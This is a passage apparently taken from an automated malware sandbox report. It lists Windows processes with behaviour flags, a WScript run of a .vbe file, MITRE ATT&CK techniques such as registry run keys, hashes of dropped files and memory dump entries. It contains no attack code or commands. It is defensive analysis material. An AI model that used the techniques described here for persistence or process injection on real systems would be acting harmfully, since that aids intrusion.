- Suspicious use of SetWindowsHookEx
PID:1500

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:3984

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4292

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
PID:4364

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:4660

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:4744

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\DismountResize.vbe"
1⤵
PID:4592

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\ie4uinit-reinstall.log

MD5
19a3ff4172faf4c611e763be6f607509

SHA1
54e8f25cf1461b03cde11c9dfadaf5f4773d930a

SHA256
23320ce4a66ad61c4017a8861a4c5c8b79cf9410707c038f944e585a6251bf9a

SHA512
faea3213269c81b6c4789e75b4becdc57f4423d472de6d6da896d5249549fa9e4e3fd4657436a88499351b644693643fcef7d1c10f99b935f3dafebf93675943

Download Submit
C:\Users\Public\readme.txt

MD5
9652c913748c3265a113ea5ba91072e5

SHA1
84176a7c183b4a10f610912ea3200c774d1de49e

SHA256
704da598ad22282a357612da9d99032dbc73a642aa670afcba275a4507941a14

SHA512
443bf15eb57bfd0de6e2dbbe2c2bab05b5fe8a50c401f802f744256abfcf7f69d045a07bff2f6a9ecdd0be56e2afb7c5edff4e46f36d2edcb1d94d9dbf164f17

Download Submit
memory/756-130-0x0000000000000000-mapping.dmp

Download
memory/812-136-0x0000000000000000-mapping.dmp

Download
memory/1172-144-0x0000000000000000-mapping.dmp

Download
memory/1832-129-0x0000000000000000-mapping.dmp

Download
memory/1900-131-0x0000000000000000-mapping.dmp

Download
memory/2044-137-0x0000000000000000-mapping.dmp

Download
memory/2800-127-0x0000000000000000-mapping.dmp

Download
memory/2816-132-0x0000000000000000-mapping.dmp

Download
memory/3168-123-0x0000021B749F0000-0x0000021B749F4000-memory.dmp

Filesize
16KB

Download
memory/3168-121-0x0000021B742C0000-0x0000021B742C1000-memory.dmp

Filesize
4KB

Download
memory/3168-126-0x0000021B742F0000-0x0000021B742F1000-memory.dmp

Filesize
4KB

Download
memory/3168-122-0x0000021B749E0000-0x0000021B749E1000-memory.dmp

Filesize
4KB

Download
memory/3168-124-0x0000021B742D0000-0x0000021B742D1000-memory.dmp

Filesize
4KB

Download
memory/3168-115-0x0000021B73E60000-0x0000021B73E61000-memory.dmp

Filesize
4KB

Download
memory/3168-120-0x0000021B74290000-0x0000021B74291000-memory.dmp

Filesize
4KB

Download
memory/3168-116-0x0000021B74250000-0x0000021B74251000-memory.dmp

Filesize
4KB

Download
memory/3168-119-0x0000021B74280000-0x0000021B74281000-memory.dmp

Filesize
4KB

Download
memory/3168-117-0x0000021B74260000-0x0000021B74261000-memory.dmp

Filesize
4KB

Download
memory/3168-134-0x0000021B76510000-0x0000021B76511000-memory.dmp

Filesize
4KB

Download
memory/3168-125-0x0000021B742E0000-0x0000021B742E1000-memory.dmp

Filesize
4KB

Download
memory/3168-118-0x0000021B74270000-0x0000021B74271000-memory.dmp

Filesize
4KB

Download
memory/3168-114-0x0000021B73E50000-0x0000021B73E51000-memory.dmp

Filesize
4KB

Download
memory/3756-135-0x0000024B31060000-0x0000024B31068000-memory.dmp

Filesize
32KB

Download
memory/3756-140-0x0000024B310D0000-0x0000024B310D1000-memory.dmp

Filesize
4KB

Download
memory/3756-139-0x0000024B31160000-0x0000024B31168000-memory.dmp

Filesize
32KB

Download
memory/3756-148-0x0000024B31060000-0x0000024B31068000-memory.dmp

Filesize
32KB

Download
memory/3756-149-0x0000024B30DE0000-0x0000024B30DE1000-memory.dmp

Filesize
4KB

Download
memory/3972-133-0x0000000000000000-mapping.dmp

Download
memory/4592-147-0x0000000000000000-mapping.dmp

Download
memory/4620-146-0x0000000000000000-mapping.dmp

Download
memory/4944-142-0x0000000000000000-mapping.dmp

Download
memory/4984-143-0x0000000000000000-mapping.dmp

Download